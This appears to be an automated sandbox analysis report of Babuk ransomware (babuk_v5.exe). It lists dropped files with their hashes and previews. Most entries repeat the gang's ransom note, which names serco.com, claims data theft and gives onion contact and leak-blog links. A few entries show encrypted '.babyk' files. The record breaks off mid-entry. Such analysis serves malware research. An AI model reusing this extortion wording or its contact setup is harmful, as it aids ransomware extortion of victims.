                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.565568297840792
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl+cmH8XLQkF2HvqjTWY1h5a+jyPrFs9JaGolXaLUxNvEEn:5XEYTWY1z1yFz+L0vtn
                                                                            MD5:272149C9C40F379C4FFC4F19326E04DC
                                                                            SHA1:563E9C06DC8ACCD651868417CD7135EA5C2791A8
                                                                            SHA-256:112297062D8524DF4B6535451A9618DEE07176E81A9F23E8AEF18C0C5C31D8F4
                                                                            SHA-512:5A2161FA4FA980C69B9C0907365DEC376ED31D6848900ECF8E87A84EB416A77D47E0E52AC67C9A59891FB6BBD43D361D6F92A9B9F89722868889D07C685E5D70
                                                                            Malicious:false
                                                                            Preview: .....i.#.".tik..;(J....P..M.3........]t.e.q..J\....F....|F..Z_......F..c...6Y...u....D..k.8.U........[.5C..cG....@.;.v...A..6@....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.979973233234569
                                                                            Encrypted:false
                                                                            SSDEEP:192:cEpQmZ25zPYwSFbRGePPC2d07+0hXi1ztlQkZ/Ry1dGd:0PShRPPda7gtuqRy2d
                                                                            MD5:24E346287393E1555338CA06AD3B621B
                                                                            SHA1:6D51E4DB1D0C1B6ECCEE1B5FD83220B1F105EDF3
                                                                            SHA-256:25C93E52C1590EF3FC85745664474BDAB46DBA26880B5BAEDA85D1C3A3F3C549
                                                                            SHA-512:08AC973CECFECD5BACB321B0BDA4B8B07D0C55C13BFEE6E4EF572A515C60F4FCAA6B9D00F78C943770C2F9319DD2FA30D474DDD5FEFBFDF354211AA3C061169B
                                                                            Malicious:false
                                                                            Preview: .....Z...Tb.E'....D...3-.[.N.#!{.|i.._..6..0...o...,.....+./B.......K......S@......+.T..ai.5......7.e...W...q..:.....*....h'.|...#...L......7..'...;}3..T^....=.V....j........1..5.:V.:5....+].%....\.....J..Z>.~.[..G.Jr.m7.)....."h.7..E..}u.M...'..Xw8.T.....O......>.>iP..I..p..r{.i8.X..V.U."%&*..aq..q.^.........5R..PYj.F7.......@.c.'...f_0[..%...T..6.....f...............|......._G..Q.@v..G)..1....'.P.....g.k-...K.|X*ra.dY.....W!)r.d.e)>xY.....d."Z..g.i.....dj....@................K..`...y6?.J..5i.B.S..x..5x...Ee....p.sf)8<g...r.. .'...S....;G..\/.s..n..X...K.2...|....akH.`.#..*=1Q.x.k2.(...FR..Y.."i}.Y0D.k!..wi.,}RP..].]...%.8;...M.01....N.....}.t+..{Q..]..........@.C..3.9.J...M<..y..j"HN4S/.Og..D..(.Q5V..)....U!D.". ..A.I.`..om..E...?...'..V8[B.{].|..a<.#.j.?.....S\...v....S..^S......k.Y.d...`1`..;E.......c.z"....?g..Dn7i....m...-.....,M..P%..!M8.....G...5..JAwS.%.).8..`3.......m.B.........m..Qv3..Jg.,X.n/..........-....
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
